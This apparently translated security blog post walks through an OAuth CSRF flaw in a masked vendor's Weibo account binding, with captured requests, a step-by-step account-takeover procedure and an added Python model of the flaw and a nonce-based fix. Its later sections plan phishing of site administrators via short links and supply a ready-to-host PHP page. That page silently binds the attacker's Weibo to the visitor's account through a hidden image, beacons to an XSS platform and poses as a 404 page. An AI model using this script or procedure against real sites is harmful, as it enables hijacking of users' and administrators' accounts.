0x00 Preface

The target's address has been replaced throughout this article with a.test.com, to protect the vendor and to protect myself.

0x01 Where OAuth 2.0 commonly appears

1: The site's login page
[image: 1.png]
2: The social-account binding page
[image: 2.png]

0x02 Captured requests: binding Weibo at a certain vendor

0x02.1 Request 1:

Request:

  GET https://www.a.test.com/users/auth/weibo?can_transfer=true HTTP/1.1
  Host: www.a.test.com

Response:

  HTTP/1.1 302 Found
  Server: Tengine
  Content-Type: text/html; charset=utf-8
  Connection: keep-alive
  Date: Mon, 18 Mar 2019 10:35:32 GMT
  X-Frame-Options: DENY
  X-XSS-Protection: 1; mode=block
  X-Content-Type-Options: nosniff
  Location: https://api.weibo.com/oauth2/authorize?client_id=1881139527&redirect_uri=http%3A%2F%2Fwww.a.test.com%2Fusers%2Fauth%2Fweibo%2Fcallback&response_type=code&state=%257B%2522can_transfer%2522%253A%2522true%2522%257D
  Cache-Control: no-cache
  Set-Cookie: read_mode=day; path=/
  Set-Cookie: default_font=font2; path=/
  Set-Cookie: locale=zh-CN; path=/
  Set-Cookie: _m7e_session_core=62d46938b5d57bcfe0ef1f3e18c52851; domain=.a.test.com; path=/; expires=Mon, 18 Mar 2019 16:35:32 -0000; secure; HttpOnly
  Set-Cookie: signin_redirect=; domain=www.a.test.com; path=/; max-age=0; expires=Thu, 01 Jan 1970 00:00:00 -0000
  X-Request-Id: a921c890-a33b-4b52-ab49-bc67597e3cca
  X-Runtime: 0.064185
  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
  Via: cache15.l2cm12-6[78,0], cache6.cn544[108,0]
  Timing-Allow-Origin: *
  EagleId: 7ce8aa4615529053323375762e
  Content-Length: 290
  <html><body>You are being <a href="https://api.weibo.com/oauth2/authorize?client_id=1881139527&amp;redirect_uri=http%3A%2F%2Fwww.a.test.com%2Fusers%2Fauth%2Fweibo%2Fcallback&amp;response_type=code&amp;state=%257B%2522can_transfer%2522%253A%2522true%2522%257D">redirected</a>.</body></html>

0x02.2 Request 2:

Request:

  GET https://api.weibo.com/oauth2/authorize?client_id=1881139527&redirect_uri=http%3A%2F%2Fwww.a.test.com%2Fusers%2Fauth%2Fweibo%2Fcallback&response_type=code&state=%257B%2522can_transfer%2522%253A%2522true%2522%257D HTTP/1.1
  Host: api.weibo.com

Response:

  HTTP/1.1 302 Found
  Server: nginx/1.6.1
  Date: Mon, 18 Mar 2019 10:35:32 GMT
  Content-Length: 0
  Connection: keep-alive
  Pragma: No-cache
  Cache-Control: no-cache
  Expires: Thu, 01 Jan 1970 00:00:00 GMT
  Location: http://www.a.test.com/users/auth/weibo/callback?state=%7B%22can_transfer%22%3A%22true%22%7D&code=c593bc150745c37a4d5ec05332d406af

0x02.3 Request 3:

Request:

  GET https://www.a.test.com/users/auth/weibo/callback?state=%7B%22can_transfer%22%3A%22true%22%7D&code=c593bc150745c37a4d5ec05332d406af HTTP/1.1
  Host: www.a.test.com

Response:

  HTTP/1.1 302 Found
  Server: Tengine
  Content-Type: text/html; charset=utf-8
  Connection: keep-alive
  Date: Mon, 18 Mar 2019 10:35:33 GMT
  X-Frame-Options: DENY
  X-XSS-Protection: 1; mode=block
  X-Content-Type-Options: nosniff
  Location: https://www.a.test.com/settings/profile
  Cache-Control: no-cache
  Set-Cookie: read_mode=day; path=/
  Set-Cookie: default_font=font2; path=/
  Set-Cookie: locale=zh-CN; path=/
  Set-Cookie: bind_sns_result=%257B%2522code%2522%3A-1%257D; path=/; expires=Mon, 18 Mar 2019 10:40:33 -0000
  Set-Cookie: _m7e_session_core=62d46938b5d57bcfe0ef1f3e18c52851; domain=.a.test.com; path=/; expires=Mon, 18 Mar 2019 16:35:33 -0000; secure; HttpOnly
  Set-Cookie: signin_redirect=; domain=www.a.test.com; path=/; max-age=0; expires=Thu, 01 Jan 1970 00:00:00 -0000
  X-Request-Id: 4f4b792f-967e-45f8-a71d-adb88e600e19
  X-Runtime: 0.391071
  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
  Via: cache15.l2cm12-6[403,0], cache6.cn544[434,0]
  Timing-Allow-Origin: *
  EagleId: 7ce8aa4615529053326897836e
  Content-Length: 106
  <html><body>You are being <a href="https://www.a.test.com/settings/profile">redirected</a>.</body></html>

0x03 Example: exploiting the vendor's third-party login binding flaw. Click me, and my Weibo gets bound to your account and logs me in as you

This needs one Weibo account and two accounts at the vendor:

  1. Weibo account: 182**77 (attacker)
  2. Vendor account A: 33*493@qq.com (attacker)
  3. Vendor account B: 28*165@qq.com (innocent victim)

Step 1: Attacker logs into Weibo.
Step 2: Attacker logs into the vendor site with account A.
[image: 3.png]
As the screenshot shows there are actually many quick-login bindings to choose from, but far fewer users will have bound Weibo, so that is the one we use.
Step 3: Attacker clicks "bind Weibo" and captures the request.
[image: 4.png]
The bind URL: https://www.a.test.com/users/auth/weibo/callback?state={"can_transfer"%3A"true"}&code=c593bc150745c37a4d5ec05332d406af
The code in this URL is the one-time token for my Weibo account.
Step 4: The victim logs into the vendor site with account B.
[image: 5.png]
Send the URL to account B and open it there: https://www.a.test.com/users/auth/weibo/callback?state={"can_transfer"%3A"true"}&code=c593bc150745c37a4d5ec05332d406af
[image: 6.png]
It now says the binding succeeded ~~~ heh heh heh
Step 5: Attacker opens a browser and chooses "log in with Weibo".

[image: 7.png]

[image: 8.png]
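The flow captured in 0x02 and the five steps of 0x03, as an added example that is not part of the original post and not the vendor's code. The capture shows that `state` is nothing but `{"can_transfer":"true"}` URL-encoded twice: the same value for every user and every request, and nothing in it ties the callback to the session that started the binding, which is why a callback URL obtained in the attacker's browser completes in the victim's. The script models that with a constructed stand-in for api.weibo.com (`WeiboStub`), a `VulnerableClient` that behaves like the capture, and a `HardenedClient` that puts a per-session nonce in `state`, authenticates it with an HMAC under a hypothetical server key `KEY`, and makes it single-use. The account names are the placeholders from 0x03; every class, function and key name is an assumption of this example.

```python
import hashlib
import hmac
import json
import secrets
from urllib.parse import parse_qs, unquote, urlencode, urlparse

# Location header from request 1 (copied from the capture above).
CAPTURED_AUTHORIZE_URL = (
    "https://api.weibo.com/oauth2/authorize?client_id=1881139527"
    "&redirect_uri=http%3A%2F%2Fwww.a.test.com%2Fusers%2Fauth%2Fweibo%2Fcallback"
    "&response_type=code&state=%257B%2522can_transfer%2522%253A%2522true%2522%257D"
)
ATTACKER_WEIBO, ATTACKER_ACCOUNT, VICTIM_ACCOUNT = "182**77", "33*493@qq.com", "28*165@qq.com"


def decode_state(authorize_url):
    """The captured state is URL-encoded twice: parse_qs undoes one layer, unquote the other."""
    return json.loads(unquote(parse_qs(urlparse(authorize_url).query)["state"][0]))


class WeiboStub:
    """Constructed stand-in for api.weibo.com: it issues single-use codes."""

    def __init__(self):
        self.codes = {}

    def authorize(self, weibo_user, state):
        # Like the 302 in request 2: send the browser to the callback with a fresh code.
        code = secrets.token_hex(16)
        self.codes[code] = weibo_user
        return "http://www.a.test.com/users/auth/weibo/callback?" + urlencode({"state": state, "code": code})

    def exchange(self, code):
        return self.codes.pop(code, None)  # consumed on first use


class VulnerableClient:
    """Mirrors the capture: state carries only app data, the callback trusts any live code."""

    def __init__(self, idp):
        self.idp = idp
        self.bindings = {}  # weibo user -> site account

    def start_bind(self, session, extra):
        return json.dumps(extra)  # identical for every user and every request

    def callback(self, session, callback_url):
        weibo_user = self.idp.exchange(parse_qs(urlparse(callback_url).query).get("code", [""])[0])
        if weibo_user is None:
            return "error"
        self.bindings[weibo_user] = session["account"]  # binds to whoever's session this is
        return "bound"

    def login_with_weibo(self, weibo_user):
        return self.bindings.get(weibo_user)


class HardenedClient(VulnerableClient):
    """state = payload.mac; the payload holds a nonce that only the starting session knows."""

    KEY = secrets.token_bytes(32)  # hypothetical server-side secret

    def _mac(self, payload):
        return hmac.new(self.KEY, payload.encode(), hashlib.sha256).hexdigest()

    def start_bind(self, session, extra):
        nonce = secrets.token_urlsafe(32)
        session["oauth_state"] = nonce
        payload = json.dumps({"nonce": nonce, **extra}, sort_keys=True)
        return payload + "." + self._mac(payload)

    def callback(self, session, callback_url):
        payload, _, mac = parse_qs(urlparse(callback_url).query).get("state", [""])[0].rpartition(".")
        issued = session.pop("oauth_state", None)  # single use, whether or not the checks pass
        if not hmac.compare_digest(mac.encode(), self._mac(payload).encode()):
            return "rejected"  # state was not produced by this server
        if issued is None or json.loads(payload).get("nonce") != issued:
            return "rejected"  # state was issued to a different session: the CSRF case
        return super().callback(session, callback_url)


def complete_flow(client_cls, cross_session):
    """Attacker starts a bind (step 3). The callback URL is then opened in the victim's
    session (steps 4 and 5, cross_session=True) or in the attacker's own session."""
    client = client_cls(WeiboStub())
    attacker, victim = {"account": ATTACKER_ACCOUNT}, {"account": VICTIM_ACCOUNT}
    state = client.start_bind(attacker, {"can_transfer": "true"})
    url = client.idp.authorize(ATTACKER_WEIBO, state)
    result = client.callback(victim if cross_session else attacker, url)
    return result, client.login_with_weibo(ATTACKER_WEIBO)


def state_is_predictable(client_cls):
    """Quick check for any capture: two starts of the flow yielding the same state is a red flag."""
    client = client_cls(WeiboStub())
    return client.start_bind({}, {"can_transfer": "true"}) == client.start_bind({}, {"can_transfer": "true"})
```

`complete_flow(VulnerableClient, True)` returns `("bound", "28*165@qq.com")`: the attacker's Weibo now logs into account B. `complete_flow(HardenedClient, True)` returns `("rejected", None)`, while the same-session flow still binds. `state_is_predictable` is the check to apply to any capture like 0x02: start the binding twice and compare the two `state` values. A plain random nonce kept in the session is enough to stop this attack; the HMAC only lets application data such as `can_transfer` ride along in `state` without being forgeable, and popping the nonce before the checks keeps one state value from being replayed.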

0x04 The vendor's account-binding flaw: thoughts on deeper exploitation

First, from my observation, the vendor's front end and back end use the same account : )
Attack idea:

  1. The vendor has a messaging feature ("某信"). We can send an administrator a malicious short URL through it, lure them into opening it so that our Weibo gets bound to their account, and then log into the back end.
  2. Use a Sina short URL (lowers the administrator's guard).
  3. When someone visits the URL, send a QQ mail to my mailbox.

Once the script is done, the ideal attack runs like this:
victim --> clicks the Sina short link --> lands on my phishing site --> it outputs the bind URL and the binding happens --> the XSS platform emails me a notification --> the page shows 404 --> done
[image: 9.png]

0x05 A simple script

  <?php
  // a_test_oauth_csrf.php
  // Rename this file, host it on a public server, then send the link and wait.

  // Fetch $url with the given cookie without following redirects, so that
  // curl_getinfo() returns the Location target in 'redirect_url'.
  // Returns the curl_getinfo() array, or false on a transport error.
  function curlRequest($url, $post = [], $cookie = '', $referurl = '') {
      if (!$referurl) {
          $referurl = 'https://www.a.test.com';
      }
      $header = array(
          'Content-Type:application/x-www-form-urlencoded',
          'X-Requested-With:XMLHttpRequest',
      );
      $curl = curl_init();
      curl_setopt($curl, CURLOPT_URL, $url);
      curl_setopt($curl, CURLOPT_USERAGENT, 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; 360SE)');
      curl_setopt($curl, CURLOPT_AUTOREFERER, 1);
      curl_setopt($curl, CURLOPT_REFERER, $referurl);
      curl_setopt($curl, CURLOPT_HTTPHEADER, $header);
      curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false); // no certificate check; this runs on the attacker's own box
      if ($post) {
          curl_setopt($curl, CURLOPT_POST, 1);
          curl_setopt($curl, CURLOPT_POSTFIELDS, http_build_query($post));
      }
      if ($cookie) {
          curl_setopt($curl, CURLOPT_COOKIE, $cookie);
      }
      curl_setopt($curl, CURLOPT_TIMEOUT, 10);
      curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
      curl_exec($curl);
      if (curl_errno($curl)) {
          curl_close($curl);
          return false;
      }
      $header_data = curl_getinfo($curl);
      curl_close($curl);
      return $header_data;
  }

  // Answer every visitor with 404; the status must be set before any output is sent.
  http_response_code(404);

  // The vendor's authorize URL (request 1 above): fixed, so it can be hard-coded.
  $url = 'https://api.weibo.com/oauth2/authorize?client_id=1881139527&redirect_uri=http%3A%2F%2Fwww.a.test.com%2Fusers%2Fauth%2Fweibo%2Fcallback&response_type=code&state=%257B%2522can_transfer%2522%253A%2522true%2522%257D';
  // Put your own Sina Weibo cookie here. With a valid cookie Weibo answers with the 302
  // from request 2, whose Location carries a fresh one-time code for your account;
  // with an expired cookie it serves its login page and there is no redirect.
  $cookie = 'my cookie, not for you';
  $result = curlRequest($url, [], $cookie);
  // The two scripts come from any XSS platform:
  // one reports that the Weibo login has expired,
  // the other that the phishing succeeded.
  if ($result === false || empty($result['redirect_url'])) {
      // echo 'login expired';
      echo '<ScRipT sRc=http://xxxxx.cn/ExiptZI></SCriPt>';
  } else {
      // echo 'still in business';
      // echo $result['redirect_url'];
      // The hidden <img> makes the victim's browser GET the callback URL with the
      // victim's own session cookie. The captured _m7e_session_core cookie has no
      // SameSite attribute; a browser that defaults to SameSite=Lax will not send it
      // on this cross-site image request, although it still does on a top-level GET
      // such as the link opened directly in 0x03.
      echo '<img src="'.$result['redirect_url'].'" style="display:none;">';
      echo '<ScRipT sRc=http://xxxxx.cn/Exi0TCW></SCriPt>';
  }
  echo '<div>404 page has been deleted</div>';

Host it on a public server, e.g. http://127.0.0.1/a_test_oauth_csrf.php, and send the link to the administrators.
Then just sit quietly like a pretty girl and wait.
XSS platform: http://xss.tf
[image: 10.png]